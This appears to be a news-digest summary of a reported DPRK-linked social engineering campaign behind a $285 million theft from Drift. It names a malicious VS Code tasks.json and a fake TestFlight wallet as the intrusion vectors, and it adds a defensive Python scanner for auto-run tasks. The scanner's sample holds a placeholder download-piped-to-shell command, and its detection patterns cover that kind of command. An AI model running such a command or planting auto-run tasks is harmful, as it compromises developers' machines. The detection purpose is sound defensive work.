Drift says the April 1, 2026 theft of $285 million was the culmination of a months-long, targeted social engineering operation by DPRK-linked actors who built trust through in-person meetings, Telegram groups, and a fake trading firm. The campaign used supply-chain tactics (a malicious VS Code project and a fraudulent TestFlight wallet), shows on-chain links to the Radiant Capital attackers, and fits a broader DPRK strategy of fragmented malware operations and IT worker fraud. #UNC4736 #Drift
Key points
- Drift attributed the $285 million April 1, 2026 heist to a six-month DPRK-led social engineering campaign.
- Security firms associate the operation with UNC4736 (aka AppleJeus/Citrine Sleet/Golden Chollima/Gleaming Pisces) and prior incidents like Radiant Capital and the 3CX breach.
- Adversaries gained trust through in-person meetings at conferences, Telegram engagement, and depositing funds to onboard an Ecosystem Vault.
- Likely intrusion vectors were a malicious VS Code tasks.json payload in a cloned repo and a fraudulent TestFlight wallet app.
- The DPRK now employs a fragmented malware ecosystem and multinational IT-worker fraud to steal cryptocurrency and funnel revenue to the regime.
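As an added defensive check for the tasks.json vector listed above (example code written for this summary, not from Drift or the cited reporting): a scanner that flags every task in a cloned repository's .vscode/tasks.json configured to run automatically on folder open, and marks those whose command matches an assumed, non-exhaustive set of risky patterns. The sample tasks.json is constructed for the example.

```python
"""Flag VS Code tasks that can run automatically when a cloned folder is opened.
The sample tasks.json below is constructed for this example."""
import json
import re

# Assumed heuristics for commands that warrant review; not a complete list.
RISKY_PATTERNS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),          # download piped into a shell
    re.compile(r"\bbase64\b.*(-d|--decode)"),                 # decoding an embedded blob
    re.compile(r"powershell.*(-enc|-EncodedCommand)", re.I),  # encoded PowerShell
]

def _command_text(task: dict) -> str:
    """Join a task's command and args (shell or process type) into one string."""
    parts = [str(task.get("command", ""))]
    parts += [str(a) for a in task.get("args", [])]
    return " ".join(parts)

def find_auto_tasks(tasks_json: str) -> list[dict]:
    """Return one finding per task with runOptions.runOn == "folderOpen",
    the setting that lets VS Code start a task without the user invoking it.
    Each finding records whether the command hit a risky pattern."""
    doc = json.loads(tasks_json)
    findings = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        cmd = _command_text(task)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": cmd,
            "risky": any(p.search(cmd) for p in RISKY_PATTERNS),
        })
    return findings

# Constructed sample: one ordinary build task and one auto-run task that pipes
# a download into sh (placeholder host, not a real indicator).
SAMPLE_TASKS_JSON = json.dumps({
    "version": "2.0.0",
    "tasks": [
        {"label": "build", "type": "shell", "command": "npm run build"},
        {"label": "setup", "type": "shell",
         "command": "curl -fsSL https://placeholder.invalid/setup.sh | sh",
         "runOptions": {"runOn": "folderOpen"}},
    ],
})

if __name__ == "__main__":
    for f in find_auto_tasks(SAMPLE_TASKS_JSON):
        print(("RISKY  " if f["risky"] else "REVIEW ") + f["label"] + ": " + f["command"])
```

Real tasks.json files are JSON with comments (JSONC), so strip comments and trailing commas before calling json.loads when running this against an actual repository; any folderOpen task deserves review even when no pattern matches.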
Read More: https://thehackernews.com/2026/04/285-million-drift-hack-traced-to-six.html